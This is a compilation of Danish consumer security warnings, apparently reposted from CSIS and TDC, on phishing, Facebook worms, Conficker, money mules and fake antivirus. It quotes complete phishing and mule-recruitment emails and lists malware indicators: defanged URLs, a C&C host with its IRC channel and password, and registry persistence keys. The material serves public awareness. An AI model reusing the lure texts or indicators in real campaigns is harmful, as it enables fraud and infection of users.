Nu er problemet imidlertid løst, og facebook-brugere med Jubii-mailadresser kan igen få glæde af det sociale netværk, der på verdensplan har 175 millioner aktive brugere.



Kilde Jubii.dk 

Modtager du mail med PowerPoint præsentationer eller spammails med links, bør du være yderst forsigtig. Det kan være den seneste trojaner fra en bande it-kriminelle.

Gruppen, som har specialiseret sig i at finde 0-dags sårbarheder i forskellige Microsoft Office applikationer og misbruge dem i forbindelse med målrettede spear phish angreb, er på spil igen.
Sikkerhedsfirmaet CSIS kender banden som '3322'.

Flere større virksomheder med en international profil samt offentlige myndigheder har været udset som mål i en spear phishing kampagne.

Det pågældende spamrun, som har haft vedhæftet en særligt udformet PowerPoint fil, er gennemført i lav volume. Den vedhæftede fil gør brug af en hidtil ukendt sårbarhed i alle ældre versioner af PowerPoint, dog undtaget Office 2007. Der er tale om en 0-dags sårbarhed.

Trojansk hest

Når den vedhæftede fil åbnes, af en uforsigtig modtager, så udløses en fejl i Microsoft PowerPoint, der muliggør kørsel af ondsindet kode.

Den pågældende kode er en trojansk hest, der forbinder den kompromitterede maskine til en IRC baseret C&C server hostet i Kina. Formålet er tydeligvis informationstyveri.

Microsoft har bekræftet sårbarheden og frigivet et særligt advisory.

Der findes endnu ingen patch, der retter problemet, så vi anbefaler, at du generelt udviser forsigtighed med vedhæftede PowerPoint filer, der ankommer uden forudgående aftale med afsenderen.
Det samme gælder spammails med links, da en PowerPoint i teorien kan indlejres på en fjendtlig webside og misbruges som drive-by platform.

På nuværende tidspunkt opnår den skadelige kode og PPT dokument kun yderst begrænset antivirus detektion.

Kilde: CSIS Security Group

 

1. april er dagen, som sikkerhedseksperter har frygtet på grund af Conficker ormen. Men indtil videre forholder den sig i ro.


Det er blevet den 1. april, og Conficker ormen, som har inficeret millioner af maskiner over hele verden, er vågnet fra sin dvale. Indtil videre dog forgæves. Banden bag ormen har endnu ikke lagt en opdatering ud, selvom ormen aktivt generer 50.000 domænenavne dagligt, hvorfra den fra en vilkårligt udvalgt liste af 500, forsøger at trække en opdatering. Ikke endnu i hvert fald.

Ikke mere farlig end andre

Conficker er gået aktiv, men det betyder ikke at den er muteret eller blevet opdateret.

Der er således ikke tegn på, at ormen bliver mere aggressiv eller finder nye måder at smitte på. Hvis du ikke allerede er ramt af ormen, har du således ingen grund til bekymring, siger it-sikkerhedseksperter til Version2.dk.

Ormen har især givet netværk problemer, da den var svær at slippe af med, da den først kom inden for.

Holder øje

Sikkerhedsfirmaet CSIS har hele natten igennem tæt monitoreret deres systemer for at være klar til en eventuel opdatering af den meget omtalte netværksorm. Indtil videre er der roligt, men hvor længe det varer kan de kun gætte på.
De ser støj fra inficerede maskiner i Danmark, som ligesom andre Conficker/Downadup zombier, leder efter en opdatering. Det var dog helt forventet og imødeset og kommer ikke som en overraskelse.

Ormen anvender funktionen "GetLocalTime" på den inficerede maskine, kombineret med et eksternt opslag mod flere populære websider, og når den konstaterer, at datoen er skiftet til den 1. april, vil den begynde at afsøge en liste af domæner for en opdatering af koden.

Hvis det ikke lykkedes at trække en opdatering fra den autogenererede liste, går ormen i dvale i 90 minutter og danner herefter en ny liste, som den forespørger for en opdatering igennem en simpel GET request.

Ormens udvikling bliver fulgt meget tæt, og så snart at ormen modtager en opdatering, hvis overhovedet, bliver der udsendt en advarsel.

Tjek din pc
Bitdefender har udgivet et værktøj, der kan fjerne ormen. Tjek din maskine og se de gode råd i artiklen.

Ormen har udnyttet en sårbarhed i Windows, som Microsoft har lukket. Så sørg for, at alle dine programmer er opdaterede.

Kilde: CSIS Security Group

 

Modtager du mails på cirkusdansk, der beder om brugernavn og password, skal du bare slette den.

Sikkerhedsfirmaet CSIS har opfanget endnu en phishingmail, der er skrevet på dansk og huserer i de danske indbakker.
Modtagerne af disse spammails skal lokkes til at opgive sensitive oplysninger til en fremmed mail-adresse.
Vi anbefaler, at du sletter denne mail med det samme og undlader at svare tilbage.

Udover at mailen er skrevet på cirkusdansk med en del sproglige brølere, så skal du også huske på, at du aldrig vil blive bedt om at opgive dit brugernavn og password af din rigtige mailudbyder.

Mailen

Phishing mailen spammes ud til vilkårlige modtagere i Danmark med følgende indhold:

Fra: Webmail Team [mailto:webmaster@web.dk]
Emne: Kære Webmail Abonnentens

Indhold:

Kære Webmail Abonnentens,

Vi kontakter dig til at minde dig om, at vores konto Review Team
identificeret nogle usædvanlige aktiviteter i din webmail-konto. Som et
resultat, adgang til din konto er blevet begrænset i overensstemmelse med Webmail Online Bruger aftalen. Din konto adgang fortsat vil være
begrænset, indtil dette spørgsmål er blevet løst. Du er derfor forpligtet
til at give de oplysninger nedenfor;

° Webmail komplette (**********) Brugernavn og Adgangskode (********)

* Vigtig *
Giv alle disse oplysninger fuldstændigt og korrekt andet på grund af
sikkerhedsmæssige årsager kan vi nødt til at lukke din webmail-konto
midlertidigt. Vi takker for din hurtige opmærksomhed på denne sag. Vi gør opmærksom på, at dette er en sikkerhed, hvis formål er at hjælpe med at beskytte dig og din Webmail-konto. Vi undskylder ulejligheden.

Tak
Webmail Team
Copyright © 2009-Webmail-All Rights Reserved

Ubehjælpsomt dansk

Bemærk, at svar adressen er en helt anden end den du kan se. Det betyder, at svar tilbage på denne type mails, lander hos it-kriminelle, der givetvis vil forsøge at anvende de indsamlede oplysninger til at logge på diverse online tjenester (webmail).

Denne bølge kommer blot få dage efter at et tilsvarende (ubehjælpsom) phishing forsøg forsøgte at lokke Cybercity kunder til at opgive samme type oplysninger.

CSIS har kontaktet mail-udbyderen, som uforsigtige brugere kan risikere at svare tilbage til og anmodet dem om at suspendere kontoen.

Kilde: CSIS Security Group

 

Bande spammer mails ud, hvor de lokker med striptease-videoer på et falsk Facebook-site.

Du har muligvis set dem i din indbakke og slettet dem som værende spam. Mailsene ankommer uopfordret og er på engelsk. De lokker med, at tidligere klassekammerater vil mødes og dele oplevelser - for eksempel en video på nettet. Og det er ikke hvilken som helst video - det er nemlig en striptease, og hun er både køn og alt muligt. Lokkemad er der nok af.

Mailen indeholder et link, der peger på en 'video', som i virkeligheden er et ubehageligt rootkit, der stjæler data fra din maskine, hvis koden aktiveres.

Fupmails

Den bande som har stået bag de såkaldte 'Classmate' fupmails hen over det seneste halve år har nu tydeligvis skiftet strategi.

Deres spammails lokker nu i stedet med det populære sociale netværk 'Facebook' og ankommer med forskelligt indhold.

Et par eksempler findes herunder:

Fra: [Spoofet - udgiver sig for at komme fra Facebook]

Emne: [flere kombinationer er mulige]

Indhold:

FaceBook message: Magnificent Striptease Dance (Last rated by Rosalind
Lindsey)

FaceBook message: Dancing girl oriental dance ... (Last rated by Abdul
Kay)

FaceBook message: Dancing Girl Drunk In The Pub-facebook Video (Last
rated by Betsy Person)

FaceBook message: Watch the Oooh! Super Beautiful Girl Dancing (Last
rated by Delores Tucker)

Link til farlige domæner

Sammen med overstående tekst er der inkluderet et link, der peger på flere fast flux understøttede domæner, hvorfra modtageren skal lokkes til at åbne filen 'Adobe_Player11.exe'. Filen tilbydes fra en websider, der ligner Facebook - men naturligvis ikke er det. Se billedet ovenover.

Hvis 'Adobe_Player11.exe', åbnes, af en uforsigtig bruger, så droppes et rootkit til windowsmappen med navnet 'new_drv.sys'.

Koden ringer herefter hjem til en server, hvor den melder den friske zombie ind i botnettet. Koden er specifikt designet til at stjæle følsomme data fra inficerede maskiner, og den kan derfor udgøre en betydelig trussel for virksomheder, eCommerce og banker.

Kilde: CSIS Security Group
 

Du skal virkelig holde tungen lige i munden for tiden, når det handler om Facebook. De kriminelle bruger sitet i stor stil.

I den seneste tid har vi set flere og flere eksempler på skadelig kode, som er skrevet til Facebook, eller designet med det formål at sprede sig via Facebook. I dag er ingen undtagelse.
Vi har to aktive trusler, som bør tages alvorligt.

Den første er en ny variant af Koobface. Det er en social netværksorm, der ikke alene rammer Facebook, men også hjemmesiderne Myscape og Bebo.

Ormen spreder sig via disse sociale netværkstjenester ved at spamme beskeder fra inficerede brugere til venner og bekendte.

Frokost-invitation

Men langt værre er det, at der også distribueres informationstyve, som udgiver sig for at komme fra Facebook, og derved kan lokke brugere til at klikke på skadeligt indhold.

I dag har vi set flere beskeder blive postet til diverse blogs på nettet og udsendt via spammails til vilkårlige modtagere. Samme beskeder er også blevet sendt igennem Facebook's beskedsystem, hvor man kan sende beskeder til hinanden på sitet.

Det skadelige indhold lokker brugeren til at klikke på et link, der leder mod en forfalsket Facebook side med skadelig kode.

Vi har set følgende overskrift anvendt som lokkemad:

"Review - My family invite you out for lunch, don't hesitate!"

Der står: Gennemgang - Min familie inviterer dig ud til frokost, tøv ikke!

Forfalsket Facebook
Der medfølger et link til disse beskeder, som modtageren skal lokkes til at klikke på. Det peger mod en forfalsket Facebook side
(se billedet).

Websiden lokker brugeren med, at der skal installeres et Adobe plugin for at se den film, der er indlejret på siden.
Koden er i virkligheden en skadelig informationstyv i Ursniff familien, og den lægger kode på maskinen, som det kan være meget besværligt omend umuligt at fjerne fra maskinen igen.

Hvis filen "Adobe_player11.exe" køres af en uforsigtig bruger, så droppes
et rootkit til windows mappen med følgende filnavn "new_drv.sys".
Koden er designet til at stjæle følsomme oplysninger fra maskinen og samtidig misbruge systemet til spamudsendelse.

Kunder, der bruger et opdateret virus/spyware program, er beskyttet mod koden i 'Adobe_player11.exe'.


Kilde: CSIS Security Group
 

Facebook er blevet et meget populært socialt netværk. Det har it-kriminelle naturligvis også fået øje på. De udnytter netværkets understøttelse af små hjemmestrikkede applikationer til at sprede uønsket indhold. Og problemet er først lige begyndt.

Sikkerhedsfirmaet CSIS har netop observeret endnu en falsk Facebook applikation, som forsøger at lokke brugere til at aktivere en uønsket applikation med 'ormeegenskaber'. Den bliver postet på brugerens profil som en notifikation med følgende besked:

[Navn på Facebook ven] has just reported you to Facebook for violating our Terms of Service. - This is your official warning! - [Click here to find out why you were reported!] - Request Facebook look at what has happened and rule immediately.

Der står, at din ven har meldt dig til Facebook for at overtræde deres regler. Du skal så lokkes til at klikke på linket for at se hvorfor, du er blevet anmeldt.

Facebook - closing down

Du skal dog selv acceptere at installere programmet. Hvis du lokkes til at acceptere applikationen, som hedder "f a c e b o o k - - closing down!!!", vil den med det samme sende/spamme sig selv videre til alle dine venner derinde.
Programmet er også i stand til at indsamle data omkring de brugere, der har fået programmet installeret.

Problemet med at acceptere denne type tredjepartsapplikationer i Facebook afspejler de kommende udfordringer, der følger med web 2.0. Fejlen vil nemlig befinde sig på brugerens profil på en ekstern server og forfølge brugeren, uden en reel mulighed for at fjerne eller godtgøre fejlen. Det betyder kort sagt, at applikationer, der accepteres af brugeren på en platform, kan fortsætte med at eksistere og løbende tilbyde forskellige popups, links eller beskeder, der potentielt kan indeholde skadelig kode.

Applikationer af denne type opnår, når de godkendes, adgang til brugerens profil med den risiko, der kan være for at følsomme private data kan indsamles og distribueres udenfor "vennekredsen".

Adgang til din profil

Facebook er designet på en "åben" måde, så helt almindelige mennesker let kan skrive applikationer til platformen til glæde for andre. Ofte vil disse være en del af oplevelsen på Facebook, men it-kriminelle også med stor lethed kan misbruge denne åbenhed og lette integration til at distribuere links og skadelig kode som i dette tilfælde.
Målet er helt åbenlyst at opnå adgang til profilen, sende beskeder videre til profilens kontakter og derved sprede sig.

Det minder meget om ormeaktivitet, og det er tæt på. Den eneste forskel er, at brugeren selv accepterer applikationen.

CSIS spår, at vi kommer til at se mange flere Facebook applikationer, som er designet til at udøve skade. Anbefalingen er, at du udviser sund fornuft og ikke godkender applikationer, du ikke kender, eller hvis formål er uklart.

Alt der lugter af trusler og advarsler skal slettes. Hvis der opstår et akut problem på Facebook vil det altid blive postet på Facebooks officielle sikkerhedsside eller i gruppen it-sikkerhed.

Kilde: CSIS Security Group


HER KAN DU GRATIS TJEKKE OM DU HAR SPYWARE/MALWARE PÅ DIN PC

http://www.tryus.dk/site/Sikkerhedsprodukter/SuperAntiSpyware/tabid/166/Default.aspx



Mvh


Try Us ApS
Larsbjørnsstræde 3, 1454 København K
Tlf.: 33377164
Fax: 33324370
Vagttelefon : 21457537

CVR.NR 26464374

Web: www.tryus.dk - www.paingone.dk - www.brabuddy.dk
 

Hvad sker der egentlig, når din pc bliver angrebet. Læs om de kriminelles metoder og se hvordan, du sikrer dig.

Det er efterhånden dagligt, at medierne taler om angreb på danske netbankkunder, pc'er og lignende. Men hvad sker der egentlig ved et angreb?

Langt de fleste it-kriminelle er ude efter dine værdier nu om dage. De gode, gamle dage hvor en hacker skrev en virus, for at der skulle ske noget sjovt på din maskine, som at du ikke kunne styre musen, eller alle dine Word-dokumenter blev slettet, er forbi. Nu handler det om at tjene penge.

Måden man kan tjene penge på som it-kriminel er at få fat kontrol over din maskine, så de kan se alt hvad, du laver på din maskine (for eksempel dine netbank-aktiviteter), bruge den til at sende spam og generelt være deres forlængede arm som en del af deres botnet.

Måder at få fat i dig

Overtagelsen af din pc starter som regel med, at de kriminelle får installeret en trojaner (bagdør) på din maskine. Ved hjælp af denne bagdør installerer de kriminelle derefter de programmer, de har brug for.
Det kan for eksempel være en keylogger, hvis de er ude efter din netbankkonto, eller det kan være programmer til at hente filer på din pc. Når først bagdøren er installeret, og de kriminelle har overtaget kontrollen med din pc, er alle muligheder åbne.

Men hvordan får de kriminelle installeret bagdøren? Det kan ske på flere måder, også uden at du foretager dig noget, der umiddelbart er forbundet med fare. De mest almindelige i dag er:

En mail med et lokkende billede

En mail med et vedhæftet dokument

En tilsyneladende uskadelig webside med indlejret kode

Falske videocodecs

Falske sikkerhedsprodukter

Når trojaneren er hentet ned på din maskine, uden du ved det naturligvis, installeres bagdøren på din maskine, og din pc bliver forbundet til de kriminelles server, hvor de kan hente flere programmer og installere dem på din maskine.

Nu kan de så overvåge alt, hvad der sker på din maskine.

Keyloggere og muldyr

En såkaldt keylogger registrerer alle dine tryk på tastaturet. Det kan jo virke ligemeget. Men det eneste de har brug for er et par linjer som: www.danskebank.dk og det der kommer efter. Så ved de godt, at de formentlig har opsnappet din pinkode. Så skal de bare rode lidt på din maskine og finde din nøgle, og så har de frit spil.

Kommer de ind til pengene i din netbank, kan de naturligvis ikke bare flytte dem over på deres egen konto, da de så vil kunne spores. Det er derfor, at de søger muldyr, som vil stille deres konto til rådighed som mellemstation.

Elektroniske muldyr

Sikkerhedsekspert Michael Dahl fra F-Secure fortæller om de kriminelles sidste nye påfund i et håb om at kunne flytte pengene uden muldyr:
- Hvis de i stedet kan flytte pengene over på en bankkonto til en anden person, hvor de også har kontrol over pc'en, så kan de flytte pengene fra bankkontoen ind på en konto på et pokersite. Her kan de så gå ind og spille pokerhånden, både til den persons pc, som nu uvidende fungerer som elektronisk muldyr - og modstanderens - nemlig deres egen. Og tilfældigvis spiller "muldyret" rigtig dårlig poker den dag - og taber alle sine penge til den egentlige bagmand. Som nu har vundet reelle 'hvide' penge, siger han.

Sådan sikrer du dig
Det kan være svært at gennemskue de mange farer på nettet, og hele tiden følge med i de it-kriminelles nye fiduser. Men hvis du tager dine forholdsregler, kan du i hvert fald sikre, at din maskine ikke er pivåben, og at de kriminelle går et andet sted hen i stedet.

Opdater din maskine
Hold hele tiden din maskine og al softwaren på den opdateret. Se under Tjek om dine programmer er opdaterede på værktøjssiden.
Brug din sunde fornuft
Moralen hedder 'Hvis noget lyder for godt til at være sandt, så er det det sikkert også'. Fald ikke for mails med alle mulige tilbud og usandsynlige lokkemidler. Læs de generelle sikkerhedsråd.

KILDE: TDC

HER KAN DU GRATIS TJEKKE OM DU HAR SPYWARE PÅ DIN PC:

http://www.tryus.dk/site/Sikkerhedsprodukter/SuperAntiSpyware/tabid/166/Default.aspx
 

Stop kædebreve.

Bly i læbestifter, gratis telefoner, frygtelige historier om børn i Afrika. Vi har alle fået kædebrevene, men skal lære ikke at sende dem videre.


Du kender det sikkert. Du modtager en mail med informationer, som simpelthen er for chokerende, for vilde eller utrolige. Du har fået den fra en af dine venner, og masser af hans/hendes venners navne står også i modtagerfeltet. Så du skynder dig at finde en masse af dine venner og sende den videre til dem også.

Nogle gange skal der samles underskrifter ind til at stoppe en retssag eller sørge for, at nogen kommer for retten. Andre gange skal du bare sende den til en masse, og så vupti, så får du en gratis telefon, bærbar eller andet godt.

Men der er virkelig mange grunde til IKKE at gøre andet end at slette mailen. Ofte sættes disse kædemails nemlig i gang af spammere, som på denne måde får samlet en masse mailadresser sammen.

En utrolig nem måde at samle mailadresser på er at skrive i kædebrevet, at når 500 har skrevet under, så skal mailen sendes tilbage til en bestemt adresse. Og det er ikke til en venlig mand, der sørger for at bringe de fortørnedes mailadresser videre, så retfærdigheden kan ske fyldest.

Tværtimod er det til en flok kriminelle, der blot vil bruge mailadresserne til flere ulovligheder.

Så stop op og tænk dig om, når et kædebrev rammer din indboks. Prøv for eksempel at søge på nettet på noget af indholdet og se, om du kan finde noget på den. Der findes hjemmesider, der samler disse fupnumre sammen og dokumenterer dem - for eksempel BreakTheChain.org.

Kilde: TDC
 

Du skal være opmærksom på hvad, du modtager på Messenger, Facebook og MySpace for tiden. Undgå at klikke på beskeder fra venner, der skriver: foto?? ha ha.

Ormen reklamerer for sig selv ved at sende links fra inficerede maskiner til samtlige adresser, der optræder på kontaktlisten i Messenger.
Den samme fremgangsmåde benyttes på Facebook, hvor ormen poster et link på vennernes væg, der peger på den skadelige kode. Målet er naturligvis at få uforsigtige brugere til at aktivere den skadelige kode ved at klikke på det pågældende link.

Ha ha

Denne orm minder om andre Facebook og MSN orme, vi har set tidligere. Den spreder sig ved at sende eller poste et link med følgende indhold (mellemrum indlagt af CSIS):

foto?? ha ha :P
Derudover er der et link, som er magen til eller ligner de nedenstående:

http://faceboo kimgs.com/images.php?=[%modtagerens e-mail adresse%]
http://www.hi 5photo.net/images.php?=[%modtagerens e-mail adresse%]
http://mysp acess.net/image.php?=[%modtagerens e-mail adresse%]

Den tekniske side

Hvis du er teknisk anlagt, kan du læse mere om hvad, ormen gør, når den har inficeret maskinen.

Hvis koden aktiveres ved at klikke på det medfølgende link, så droppes "fxstaller.exe" til windows mappen og "advpack.dll" i windows systemmappen.
Den sikrer samtidig, at den skadelige kode aktiveres efter en genstart af systemet, ved at modificere registreringsdatabasen med følgende runas værdier:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun "" = fxstaller.exe

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce "" = rundll32.exe [%windows systemmappen%]advpack.dll

Den forbinder sig, efter den er blevet aktiveret, til en IRC baseret C&C server på følgende adresse (mellemrum indlagt af CSIS): ddd.buri milol.com. På IRC BOT serveren joiner den "channel" ##dd## med password: bole.

Ormen bliver fanget af de fleste antivirus-produkter inklusiv TDC's sikkerhedspakke.

Kilde: CSIS Security Group
 

 

 

Ny fupmail går landet rundt.

22. AUGUST 2008

Ny fupmail går landet rundt.

Sender dine venner dig en advarsel mod Postkort fra Hallmark, skal du slette mailen. Det er et kædebrev uden hold i virkeligheden.

Sikkerhedsfirmaet CSIS har modtaget mange mails fra bekymrede private brugere og danske virksomheder, som i øjeblikket modtager et ubehageligt kædebrev.

Brevet truer med en ny virus, som angiveligt brænder hele harddisken af. Og i sædvanlig kædebrevsstil skal du selvfølgelig sende det videre til alle, du kender.

Denne type mails skal slettes og IKKE videresendes. Det er komplet spild af tid.

Kædebrevet er en gammel kending fra begyndelsen af 2008, som er oversat fra engelsk til dansk. Du kan læse den oprindelige tekst hos Urbanlegends.com.

Kædebrevet ankommer med følgende indhold:

'DANSK'
LÆS & Videresend !

Videresend denne advarsel, blandt venner, familie og kontakter!

Forsøg ikke at åbne nogen besked med et bilag med titlen 'Postkort fra Hallmark ', uanset hvem der har sendt den til dig. Det er en virus, der åbner et postkort billede, som 'brænder' hele harddisken C på din computer. Denne virus vil blive modtaget af nogen, der har din e-mail-adresse i deres kontakt liste. Derfor er du nødt til at advare alle dine kontaktpersoner. Det bedre at få det budskab ud 25 gange end at modtage virus og åbne det.

Hvis du modtager en mail kaldet postkort, skønt sendt til dig fra en ven, må du ikke åbne den! Slet den omgående. Sluk computeren øjeblikkeligt.

Dette er den værste virus bebudet af CNN. Det er blevet klassificeret af Microsoft som den mest ødelæggende virus nogensinde. Denne virus blev opdaget af McAfee i går, og der er ingen reparation endnu for denne type virus.
Denne virus ødelægger harddisken, hvor vigtige oplysninger opbevares.

Kilde: CSIS Security Group

 

 

LÆS ALLE UDSENDTE NYHEDER PÅ WWW.TRYUS.DK


8.000 danske pc'ere inficeret med spionprogram


Finansrådet og flere danske banker gik fredag eftermiddag ud med en advarsel til deres netbankbrugere om, at deres pc er inficeret med et spionprogram.

Sikkerhedseksperter mener, at i alt 8000 danske pc'ere er inficeret.
Spionprogrammet giver de it-kriminelle adgang til alt på den inficerede pc og kan aflure alt hvad du foretager dig, herunder også din i netbank. Læs mere hos Finansrådet.
Opdater din pc.

De mange pc'ere er blevet inficeret, fordi de ikke har hentet og installeret de seneste sikkerhedsopdateringer fra Microsoft.

Det er derfor yderst vigtigt, at du holder din maskine opdateret. Du kan eksempelvis bruge programmer, der kan tjekke al softwaren på din pc og se, om du har sørget for at få dem opdateret.

Programmerne finder du på Værktøjssiden under Tjek om dine programmer er opdaterede.
På samme side finder du værktøjer, der kan scanne hele din pc for virus og andet malware. Flere af programmerne kan også fjerne det, de finder.

Hvis uheldet er ude
Hvis du er blevet inficeret med det nye spionprogram, skal din netbank spærres. Når du har geninstalleret din pc, anbefales det at tjekke, at dine programmer er korrekt opdateret på Værktøjssiden under Tjek om dine programmer er opdaterede. Når din pc er klar, kan du bede banken om, at få din netbank genåbnet.

Bankerne understreger, at selvom det er lykkedes de kriminelle bagmænd at inficere de mange pc'er, har de ikke set eksempler på tab som følge af dette spionprogram i Danmark.

Kilde : TDC

TJEK GRATIS DIN PC HER FOR AT SE OM DU HAR SPYWARE PÅ DIN PC.

http://www.tryus.dk/site/Sikkerhedsprodukter/SuperAntiSpyware/tabid/166/Default.aspx

Eller klik på Sikkerhedsprodukter i venstreside - Klik på SuperAntiSpyware


 

>
FileHippo

Update Checkeren scanner din pc for at se hvilken software, du har installeret, tjekker versionerne og sender så informationerne til FileHippo for at se, om der er nyere versioner. Er der opdateringer, bliver de vist i din browser, så du nemt kan hente dem.

Du kan hente det GRATIS program her:

http://www.filehippo.com/updatechecker/
 

Lad dig ikke lokke af venlig mail til at blive hvidvasker eller muldyr. Det er strafbart og let at blive opdaget.


27. december 2008

I disse dage rammes masser af danske indbakker af et forsøg på at rekruttere muldyr.
Selvom tonen er flink og venlig, skal du ikke lade dig narre til at hjælpe med at vaske penge for de kriminelle bagmænd.
Sikkerhedsfirmaet CSIS advarer også imod at deltage i disse ulovligheder, som er lette at spore i Danmark.
Ofte hjælper muldyrene med at tømme kontoen hos én, der er blevet hacket.
Meningen er, at muldyret skal sende pengene videre til bagmændene via Western Union eller Money Gram, da man ikke kan overføre penge til udlandet via netbank.
Du får naturligvis en procentdel af byttet som tak for ulejligheden. Men det er som sagt relativt let at spore den slags, så din ulejlighed kan ende med at blive meget stor.
Designere beder om hjælp
De to nedenstående mails er eksempler på dem, der huserer i øjeblikket. For en gangs skyld er de godt skrevet.
Det er en god idé at læse dem - både for at se, hvad du skal være opmærksom på, men også for at lære deres stil at kende. Denne slags mails bruger ofte stilen med at være direkte og personlig, så folk tror, at det virkelig er dem, der bliver talt til.
Hello, and sorry for disturbing you...
How are you? Hope everything is fine... And World Finance Crisis bypassed you ;).
I have a business offer for you... but to tell the truth I just need your help.

I'm a freelancer - I'm making web sites, logos, styles and others... I really do love this work, but now I have some difficulties and I hope you can help me to solve it.

My client lives in your country. I made work (design) for this client, but he do not want to send the money via Western Union or Money Gram. He want to send the bank transfer. I do have the bank account - but it is not profitably for me as far as I'll pay 55% taxes (22% VAT, 8.5% is pension fund, 18 % is income tax, etc) from such transfer :(... I'm a student and I do not have lot of money to pay them to the bank.
You could help me and earn some money also. You will accept moneys to your account and send them to me via Western Union, and get % for your kindness. :) We could discuss about guaranties. I know that amounts less than EUR 12,500 are taxless.
I'm still believe in miracle... may be it's a little bit stupid, but never the less...
I'll be glad to repay for your kindness. So, if you'll be so kind and could help me with my problem - please send the e-mail, I'll contact with you to discuss about the terms.
Reply will not work cause i am using public email service to send this offer.
Please, ask to my work e-mail: musiowski.hrmanager@gmail.com
Thank you for your time.
Wish you good luck,
Stanislav Stolyarov
og
Hello, and sorry for disturbing you...
How are you? Hope everything is fine... And World Finance Crisis bypassed you ;).
I have a business offer for you... but to tell the truth I just need your help.

I'm a designer-freelancer - I'm making web sites, logos, styles and others... I really do love this work, but now I have some difficulties and I hope you can help me to solve it.

My client lives in your country. I made work (design) for this client, but he do not want to send the money via Western Union or Money Gram. He want to send the bank transfer. I do have the bank account - but it is not profitably for me as far as I'll pay 55% taxes (22% VAT, 8.5% is pension fund, 18 % is income tax, etc) from such transfer :(... I'm a student and I do not have lot of money to pay them to the bank.
You could help me and earn some money also. You will accept moneys to your account and send them to me via Western Union, and get % for your kindness. :) We could discuss about guaranties. I know that amounts less than EUR 12,500 are taxless.
I'm still believe in miracle... may be it's a little bit stupid, but never the less...
I'll be glad to repay for your kindness. So, if you'll be so kind and could help me with my problem - please send the e-mail, I'll contact with you to discuss about the terms.
Reply will not work cause i am using public email service to send this offer.
Please, ask to my work e-mail: musiowski.hrmanager@gmail.com
Thank you for your time.
Wish you good luck,
Solovyova Vera

Hvad er et muldyr ?

Et muldyr eller på engelsk 'money mule' er en person, som lader sig hyre til at hvidvaske penge for it-kriminelle. Muldyret bliver typisk rekrutteret igennem en spammail-kampagne, som sendes til mange tusinde på samme tid.
I mailen lokkes der med lette penge og et hurtigt udbytte.
Muldyret tilbydes at modtage penge på sin private bankkonto og for ulejligheden indkassere et beskedent provenu på 10-15 procent. Men hvad muldyret ikke får at vide er, at pengene stammer fra en angrebet netbankkunde. Pengene er uden ejerens samtykke eller viden blevet overført til muldyrets konto. Dermed medvirker muldyret aktivt i en strafbar handling.


Ps. Læs alle informationer/advarsler på www.tryus.dk

Mvh

Gert Nielsen Fleron
www.tryus.dk


STØT TRY US APS.

Der er flere af vores brugere, som har haft lyst til at give brød til kaffen i taknemlighed over vores hjælp, derfor har vi oprettet en konto, hvor man kan indsætte et beløb, stort eller lille.

Læs mere her :

http://www.tryus.dk/site/StøtTryUsApS/tabid/66/Default.aspx
 

Det er let at forstå, hvorfor så mange bliver snydt af de falske sikkerhedsprogrammer. Se hvordan de fupper dig.

Snart er der dagligt historier om internetbrugere, der har ladet sig lokke til at købe et falsk antivirus-program. Det kan undre, at folk bliver snydt og lader sig narre.

Sikkerhedsfirmaet F-Secure har set ind bag nogle af de tricks, som programmet powerfulvirusremover2008 .com benytter sig af - og de er temmeligt luskede.

Hjemmesider i mange lande

De kriminelle bag programmet har gjort sig store anstrengelser. De har oprettet hjemmesider for hvert land, så de servicere det specifikke publikum bedst muligt. De har oprettet hjemmesider på alle disse domæner:

Jp, de, dk, es, fr, it, no, nl og no.

Men der er ingen forskel på de forskellige hjemmesider, og de er alle på engelsk. Den eneste forskel ligger i selve betalingen, hvor den så ved, hvor du kommer fra.

På denne måde forsøger de at give den interesserede bruger følelsen af, at de er et stort foretagende.

Vilkårene siger det hele

Hvis en bruger kører programmet, som af antivirusfirmaerne har fået navnet Rogue:W32/VirusRemover2008.C, bliver han mødt af en meget spændende EULA - som står for End User License Agreement (vilkårene).
For det første er der formentlig meget få mennesker på denne planet, som nogensinde læser dem. Vi klikker os bare videre, til programmet er installeret sikkert på pc'en.
Hvis man efter installationen af dette program undrer sig over, at maskinen ikke virker og står og spytter malware ud og klager til firmaet, vil de bare sige, at du var blevet advaret i paragraf et eller andet i EULA'en.

Men den er faktisk god nok - EULA'en indeholder i dette tilfælde virkelig nogle af de uanstændigheder, som programmet VirusRemover2008 gør ved din maskine. Man må trods alt give dem lidt ros for, at de har haft modet til at skrive det i deres EULA.

Første uddrag:

Her strår der direkte, at nogle af deres produkter ikke egner sig til at blive kørt sammen med andre produkter. Og det giver dem så ret til at afinstallere disse produkter. Kunden kan ikke kræve nogle penge af firmaet i disse tilfælde.
Og man må spørge sig selv, hvilke produkter, det kan være, der bliver afinstalleret.. Måske det rigtige antivirus-program?

Andet uddrag:

Her tager de forbehold for mangel på virusser... Mener de i virkeligheden de virusser, som de påstod, der var på computeren?

Måske skal man begynde at overveje at læse alt det, der står med småt. Dette er i hvert fald ret skræmmende læsning.

Spændende scanning

Men hvis du bare klikker dig igennem installations-proceduren og kører demoen, vil du se nogle af disse billeder som resultat af en scanning af din pc.

Først scanner programmet dit system:

Så fortæller det dig, at pc'en er inficeret:

Og så er der selvfølgelig masser af links til at købe produktet.

Men du behøver slet ikke at tjekke filerne på listen. De findes ikke på din computer. For det eneste sted, de findes, er i en tekstfil, som de har lagt på din pc.
Så let er det at blive snydt...

Så de gode råd er:
Hold dig til de anerkendte antivirus-producenter.
Søg eventuelt på navnet på produktet, inden du køber noget og se, hvad andre skriver om det.

Kilde TDC

 

Pas på 'UMB' netbank-tyv

En demo af en netbank fra UMB skal have Flash Playeren opdateret for at køre - men den henter skadelig kode.

Pas på hvis du modtager mail fra 'UMB' bank. Det er en datatyv, som du bestemt ikke har lyst til at have noget med at gøre.

Et nyt, endnu ikke identificeret BOTnet har i flere større bølger med forskellige temaer startet flere massive spamkampagner.

I weekenden lokkede indholdet med at genfinde tidligere klassekammerater. Nu
udsender det samme BOTnet en ny bølge af spammails, der udgiver sig for at
komme fra en bank kaldet 'UMB'.
Det bedste og eneste rigtige, der er at gøre, er at slette disse mails. Den bruger en demo af netbanken og opdatering af Flash Player som lokkemad. Når du ser demoen, vil der poppe et vindue op, som beder dig opdatere din Flash Player. Men den henter ikke en opdatering men en skadelig fil.

Opdater din Flash-player

